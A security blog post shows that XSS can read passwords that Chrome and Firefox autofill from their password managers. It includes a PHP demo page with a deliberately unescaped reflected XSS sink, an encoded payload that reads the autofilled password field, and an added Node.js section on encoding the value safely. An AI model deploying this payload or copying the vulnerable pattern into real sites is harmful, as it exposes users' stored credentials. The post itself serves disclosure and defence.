Monday, January 23, 2017

Password Stealing from Password Manager of Modern Browsers

Stealing passwords from McDonald's users became a topic of conversation. That article was translated and covered by the Japanese web media. Of course, XSS is a typical security flaw and should be addressed, but it looks like the McDonald's password manager issue is really just a general issue of password managers.

Let's look at the password managers of modern browsers.

Table. Can an attacker steal a user's password stored in the password manager by XSS?

Browser              | Auto filled?                   | Can be stolen?
IE11                 | No (requires user operation)   | Yes (requires user operation) *1
Chrome 55.0.2883.87  | Yes                            | Yes
Firefox 50.1.0       | Yes                            | Yes
Safari 10.0.2        | No (requires user operation)   | Yes (requires user operation)

*1 IE's XSS filter is difficult to defeat if the attack vector is a reflected one.

Once Chrome or Firefox users save passwords to the password manager, an attacker can steal them by XSS. (Chrome does not allow reading the password field without user interaction when the user navigates to the XSSed page from an <a> tag, but this does not seem to be intended behavior.)
In McDonald's case, the attacker had to find the encryption key and decrypt the encrypted cookie, but these password managers don't require such complicated attack vectors. Just do XSS and read the password field!

Step 1. Input your ID/password and submit them to the server.


Step 2. Save password to your browser.


Step 3. XSS and steal the password from the auto-filled password field.


I put my sample code, described below, on my test server: http://133.242.134.241/exploit/password_manager.php

If you want to XSS it from another site, please try this.

Sample code:
<body>
<?php
// First visit: show a login form so the browser offers to save the credentials.
if(!isset($_GET["xss"]) && !isset($_POST["pass"])) {
?>
Please submit id/pass to use password manager.
<form action="?" method="post">
<input name="id"><br>
<input type="password" name="pass">(use dummy password)<br>
<input type="submit">
</form>
<?php
} else {
?>
Please click below to fire XSS after saving your password to the password manager.<br>
<a href="#" onclick="location.href='?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=id%3E%3Cinput%20type=password%20name=pass%3E%27%3bi=setInterval(function(){p=document.forms[0].pass.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27'">Fire XSS!</a>
<script>
  // The "xss" parameter is echoed unescaped into a JS string literal on purpose:
  // this is the reflected XSS the demo relies on.
  var a='<?php echo $_GET["xss"] ?>';
</script>
<?php
}
?>
</body>
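The demo above reflects the "xss" parameter straight into a single-quoted JavaScript string literal, which is what lets one quote character end the literal and run the rest as script. As an added example (Node.js, not code from the post), here is that vulnerable rendering beside a context-aware encoder for exactly that spot; the function names and the sample value are my own.

```javascript
// Added example: vulnerable reflection into a JS string literal beside
// an encoder for that context. Not the post's code.

// Vulnerable rendering, mirroring  var a='<?php echo $_GET["xss"] ?>';
function renderVulnerable(param) {
  return "<script>\n  var a='" + param + "';\n</script>";
}

// Encode a value for use as a JavaScript string literal inside an HTML
// <script> element. JSON.stringify escapes quotes, backslashes and control
// characters; the extra replacements keep the HTML parser from seeing
// "</script" or "<!--" inside the literal and make U+2028/U+2029 safe in
// engines that treat them as line terminators.
function encodeForJsString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Hardened rendering: the value can never close the literal or the element.
function renderHardened(param) {
  return "<script>\n  var a=" + encodeForJsString(param) + ";\n</script>";
}

// Evaluate just the encoded literal to prove it round-trips to the original
// value. Only ever call this on encodeForJsString() output.
function decodeLiteral(literal) {
  return new Function("return " + literal)();
}

// Constructed sample with the same break-out shape as the post's link:
// a closing quote, a statement, then a quote to re-balance the literal.
const SAMPLE = "';alert(1);'";

// Side by side: in the first, alert(1) has become its own statement;
// in the second, the whole sample is still just the value of `a`.
console.log(renderVulnerable(SAMPLE));
console.log(renderHardened(SAMPLE));
```

The PHP equivalent of encodeForJsString is json_encode($v, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT). Since the autofill behaviour belongs to the browser, keeping reflected input out of script context is the part the site itself controls.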